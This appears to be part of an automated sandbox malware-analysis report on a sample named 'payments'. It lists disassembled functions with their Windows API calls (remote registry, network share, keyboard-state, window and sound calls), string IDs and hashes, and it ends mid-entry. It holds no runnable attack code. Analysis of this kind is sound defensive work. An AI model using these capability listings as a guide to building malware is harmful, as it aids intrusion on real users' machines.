                                                                                                                          • Opcode Fuzzy Hash: a72dabc9df532bb9cc57db163e1eaf436078e90d5fb25fe978761a8537b4bd82
                                                                                                                          • Instruction Fuzzy Hash: 7971C270640615BFEB209B55DC49FAABF66FB01368F244207F728AA3D1C7719910EBA0
                                                                                                                          Function 00CCA14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 00CCA1DC
                                                                                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00CCA211
                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00CCA22D
                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00CCA249
                                                                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00CCA273
                                                                                                                          • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00CCA29B
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00CCA2A6
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00CCA2AB
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                          • API String ID: 1687751970-22481851
                                                                                                                          • Opcode ID: a8bc2b956def7925c04f4572abd180753d056ee7a3854ca8193f1c3884f79069
                                                                                                                          • Instruction ID: 85d37d490731f45afc68e0a77b2f8d97e81a9e26b71332acdb01829b61c918cc
                                                                                                                          • Opcode Fuzzy Hash: a8bc2b956def7925c04f4572abd180753d056ee7a3854ca8193f1c3884f79069
                                                                                                                          • Instruction Fuzzy Hash: FD41F676C1022DAFCF11EBA4DC99EEDB778AF08304F004169F915B2260EB309E05DB60
                                                                                                                          Function 00CF3C06 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CF2BB5,?,?), ref: 00CF3C1D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: BuffCharUpper
                                                                                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                          • API String ID: 3964851224-909552448
                                                                                                                          • Opcode ID: 218655c861fff2cba2cfd9ff56d1eb0a503216bab35400e7320ed1f291ed031d
                                                                                                                          • Instruction ID: ed167d6bd1a37e88812e8bf77d4065feba46844876ab67c4fd582bcf47b2b933
                                                                                                                          • Opcode Fuzzy Hash: 218655c861fff2cba2cfd9ff56d1eb0a503216bab35400e7320ed1f291ed031d
                                                                                                                          • Instruction Fuzzy Hash: FB417E3012028EABCF40EF10D851AFB3365BF22318F104814ED655B292EB70EE4ADF61
                                                                                                                          Function 00CFA1B6 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00CFA259
                                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00CFA260
                                                                                                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00CFA273
                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00CFA27B
                                                                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00CFA286
                                                                                                                          • DeleteDC.GDI32(00000000), ref: 00CFA28F
                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00CFA299
                                                                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00CFA2AD
                                                                                                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00CFA2B9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                          • String ID: @U=u$static
                                                                                                                          • API String ID: 2559357485-3553413495
                                                                                                                          • Opcode ID: 1a3a89d92931cf5bbda05946d53f319c131bbcddb3f0f16c4bdb9f4680f8fb05
                                                                                                                          • Instruction ID: 15c97b15e97bea8a062e2cc0e04915b257df5ffdeddadcc28759a3261d60b10b
                                                                                                                          • Opcode Fuzzy Hash: 1a3a89d92931cf5bbda05946d53f319c131bbcddb3f0f16c4bdb9f4680f8fb05
                                                                                                                          • Instruction Fuzzy Hash: B5319E71200219BFDF119FA4DC49FEA3B69FF09360F114214FA29E61A0CB35D812DBA5
                                                                                                                          Function 00CD25B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00D036F4,00000010,?,Bad directive syntax error,00D2DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00CD25D6
                                                                                                                          • LoadStringW.USER32(00000000,?,00D036F4,00000010), ref: 00CD25DD
                                                                                                                          • _wprintf.LIBCMT ref: 00CD2610
                                                                                                                          • __swprintf.LIBCMT ref: 00CD2632
                                                                                                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00CD26A1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                          • API String ID: 1080873982-4153970271
                                                                                                                          • Opcode ID: 7241f304e07d7fba7eae0f248240aa352f95189ac7cb56ee723cc6eec51a3eff
                                                                                                                          • Instruction ID: d3654ad3d581e58bc21830ec2b0698ab518c1273d985c43db445e58acdcfaa26
                                                                                                                          • Opcode Fuzzy Hash: 7241f304e07d7fba7eae0f248240aa352f95189ac7cb56ee723cc6eec51a3eff
                                                                                                                          • Instruction Fuzzy Hash: 6E21413184031ABFCF12EF90CC5AEEE7779BF19304F044455F615661A2EB71A619EB60
                                                                                                                          Function 00CD7AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00CD7B42
                                                                                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00CD7B58
                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CD7B69
                                                                                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00CD7B7B
                                                                                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00CD7B8C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: SendString
                                                                                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                          • API String ID: 890592661-1007645807
                                                                                                                          • Opcode ID: 1c24af466380e66bb529e90cb0d3fc493ee4fbb29535b439a753003de6df8a9c
                                                                                                                          • Instruction ID: cee467cc803909fbfa812f1dc87d0898e32de339c4bc9287f4635d58fb1353be
                                                                                                                          • Opcode Fuzzy Hash: 1c24af466380e66bb529e90cb0d3fc493ee4fbb29535b439a753003de6df8a9c
                                                                                                                          • Instruction Fuzzy Hash: C51194A16502597EDB20B7A5CC8ADFFBA7CEB91B10F00051A7551A21D1EE701A49C6B0
                                                                                                                          Function 00CE02EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C9936C: __swprintf.LIBCMT ref: 00C993AB
                                                                                                                            • Part of subcall function 00C9936C: __itow.LIBCMT ref: 00C993DF
                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00CE034B
                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00CE03DE
                                                                                                                          • SHGetDesktopFolder.SHELL32(?), ref: 00CE03F2
                                                                                                                          • CoCreateInstance.OLE32(00D1DA8C,00000000,00000001,00D43CF8,?), ref: 00CE043E
                                                                                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00CE04AD
                                                                                                                          • CoTaskMemFree.OLE32(?,?), ref: 00CE0505
                                                                                                                          • _memset.LIBCMT ref: 00CE0542
                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00CE057E
                                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00CE05A1
                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00CE05A8
                                                                                                                          • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00CE05DF
                                                                                                                          • CoUninitialize.OLE32(00000001,00000000), ref: 00CE05E1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1246142700-0
                                                                                                                          • Opcode ID: dbf9d36dd36c4cd1d83020f6c915176bcb44fb99d27135c1546da31aced681ef
                                                                                                                          • Instruction ID: 1de8341cc515f72150b0e7e0de7220f5a45d985f4892fd69150e097b33aca968
                                                                                                                          • Opcode Fuzzy Hash: dbf9d36dd36c4cd1d83020f6c915176bcb44fb99d27135c1546da31aced681ef
                                                                                                                          • Instruction Fuzzy Hash: 53B1EB75A00209AFDB04DFA5C889DAEBBB9FF48314B148459F905EB251DB70EE81CF50
                                                                                                                          Function 00CD2E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetKeyboardState.USER32(?), ref: 00CD2ED6
                                                                                                                          • SetKeyboardState.USER32(?), ref: 00CD2F41
                                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00CD2F61
                                                                                                                          • GetKeyState.USER32(000000A0), ref: 00CD2F78
                                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00CD2FA7
                                                                                                                          • GetKeyState.USER32(000000A1), ref: 00CD2FB8
                                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 00CD2FE4
                                                                                                                          • GetKeyState.USER32(00000011), ref: 00CD2FF2
                                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 00CD301B
                                                                                                                          • GetKeyState.USER32(00000012), ref: 00CD3029
                                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00CD3052
                                                                                                                          • GetKeyState.USER32(0000005B), ref: 00CD3060
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: State$Async$Keyboard
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 541375521-0
                                                                                                                          • Opcode ID: d1e8820c3b29bb2f3e0cf00891a1d612d9c55c9a811436367708f1ece05099d5
                                                                                                                          • Instruction ID: 84fa187cf28deb2c5989552660e7ed386cfac4d56971117608853085e4e658da
                                                                                                                          • Opcode Fuzzy Hash: d1e8820c3b29bb2f3e0cf00891a1d612d9c55c9a811436367708f1ece05099d5
                                                                                                                          • Instruction Fuzzy Hash: 2951D520A047D429FB35EBA488507EABBB45F21340F08859FD7D2567C2DB64AB8CD762
                                                                                                                          Function 00CCED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00CCED1E
                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00CCED30
                                                                                                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00CCED8E
                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00CCED99
                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00CCEDAB
                                                                                                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00CCEE01
                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00CCEE0F
                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00CCEE20
                                                                                                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00CCEE63
                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00CCEE71
                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00CCEE8E
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00CCEE9B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3096461208-0
                                                                                                                          • Opcode ID: 1604ec7c1cdc0f46355c480f2dbd33ad6c08d9f09e9148b5b1b59bfd9ac832f0
                                                                                                                          • Instruction ID: 5ec48e07a58e52f08223e9273a8e370c948d14303452c4fedb85b0265ef57fbb
                                                                                                                          • Opcode Fuzzy Hash: 1604ec7c1cdc0f46355c480f2dbd33ad6c08d9f09e9148b5b1b59bfd9ac832f0
                                                                                                                          • Instruction Fuzzy Hash: 8651F171B00209AFDB14CF69DD85EAEBBB6AB89701F14812DF515D6290DB709E018B10
                                                                                                                          Function 00CAB73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00CAB759,?,00000000,?,?,?,?,00CAB72B,00000000,?), ref: 00CABA58
                                                                                                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00CAB72B), ref: 00CAB7F6
                                                                                                                          • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00CAB72B,00000000,?,?,00CAB2EF,?,?), ref: 00CAB88D
                                                                                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 00D0D8A6
                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00CAB72B,00000000,?,?,00CAB2EF,?,?), ref: 00D0D8D7
                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00CAB72B,00000000,?,?,00CAB2EF,?,?), ref: 00D0D8EE
                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00CAB72B,00000000,?,?,00CAB2EF,?,?), ref: 00D0D90A
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00D0D91C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 641708696-0
                                                                                                                          • Opcode ID: 64ce219c50cbd9d1e0056f4859627dab251b705c3b6756f9de2abd8d66223862
                                                                                                                          • Instruction ID: a128b79867b6193a9b28003fda4c60271e757800227fad06f5935d63f9140066
                                                                                                                          • Opcode Fuzzy Hash: 64ce219c50cbd9d1e0056f4859627dab251b705c3b6756f9de2abd8d66223862
                                                                                                                          • Instruction Fuzzy Hash: E461BA34500702EFDB258F59E888B65B7F6FF8631AF18441EE446C6AA1CB74AC80DF60
                                                                                                                          Function 00CAB40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAB526: GetWindowLongW.USER32(?,000000EB), ref: 00CAB537
                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00CAB438
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ColorLongWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 259745315-0
                                                                                                                          • Opcode ID: 9e835608c3c57ae1d7846471084a84e4aa78e399e55d6848680137348da9942c
                                                                                                                          • Instruction ID: 6842135fb288f8c11d72378957b1a6b540db1b6b70764f464e8edba1bd445e69
                                                                                                                          • Opcode Fuzzy Hash: 9e835608c3c57ae1d7846471084a84e4aa78e399e55d6848680137348da9942c
                                                                                                                          • Instruction Fuzzy Hash: D4419371040245BFDB205F68D889BF93B66AB4B735F188291FD658A2E7D7308D82D731
                                                                                                                          Function 00CD690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 136442275-0
                                                                                                                          • Opcode ID: 7c9dd8f37e4ac0311ac3b7ffe0636624eca1366a02d1b09ce7fd7691c1d84801
                                                                                                                          • Instruction ID: cfc4b4065097c9b8a5b0044641d06a01f5fc94f620df0a2120a80de55efb8f0f
                                                                                                                          • Opcode Fuzzy Hash: 7c9dd8f37e4ac0311ac3b7ffe0636624eca1366a02d1b09ce7fd7691c1d84801
                                                                                                                          • Instruction Fuzzy Hash: 2E410E7684511CAECF61EB94CC86DDBB3BCEB44300F1041A7B699A2151EB30ABE9DF51
                                                                                                                          Function 00CDD76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CharLowerBuffW.USER32(00D2DC00,00D2DC00,00D2DC00), ref: 00CDD7CE
                                                                                                                          • GetDriveTypeW.KERNEL32(?,00D43A70,00000061), ref: 00CDD898
                                                                                                                          • _wcscpy.LIBCMT ref: 00CDD8C2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                          • API String ID: 2820617543-1000479233
                                                                                                                          • Opcode ID: 30347dbdcc30fab5ee6e1e94aaba22ec4670c6b2b6202a4cfe5e0947e4fa2c1f
                                                                                                                          • Instruction ID: 2bd277f7d702d7a146a4056e7d7aabfd362a544d7db8a0fa10c27d497b31ab2f
                                                                                                                          • Opcode Fuzzy Hash: 30347dbdcc30fab5ee6e1e94aaba22ec4670c6b2b6202a4cfe5e0947e4fa2c1f
                                                                                                                          • Instruction Fuzzy Hash: 49518331544301AFC701EF14DC92AAEB7A5EF95318F10882EF5AA57392DB31DE05EA92
                                                                                                                          Function 00CFB33A Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 167COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00CFB3F4
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
